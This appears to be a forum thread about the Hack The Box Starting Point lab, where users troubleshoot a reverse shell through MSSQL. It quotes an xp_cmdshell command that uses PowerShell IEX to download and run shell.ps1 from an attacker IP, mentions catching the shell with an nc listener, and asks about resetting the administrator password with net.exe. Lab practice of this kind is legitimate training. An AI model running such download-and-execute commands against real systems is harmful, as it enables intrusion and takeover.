Did the Starting point process again from scratch after running into SQL powershell errors. This time however when I run the SQL command: "xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString("http://10.10.14.32/shell.ps1\“);”
It does not return any errors, just immediately prompts for the next SQL command and the python webserver received no GET request
Does the powershell file need to be in a specific directory? in the same directory as the mssqlclient.py file? Does the SQL command need the full path to the powershell file?
And also make sure that you have an nc tab listening on the port you specified in your shell.ps1.
The script will execute and you should get a shell in the nc tab.
For some reason it worked after I just ran through the box again from the beginning. I was able to complete it. I must’ve missed something small. I didn’t put in the port number in the command “.DownloadString("http://:8080/shell.ps1");” and it still worked for me, actually. But I should’ve tried that. I’ll have to remember that.
In this image we can see that I can make the connection correctly, but I cannot execute the type and net.exe commands in order to change the administrator password. Could you help me?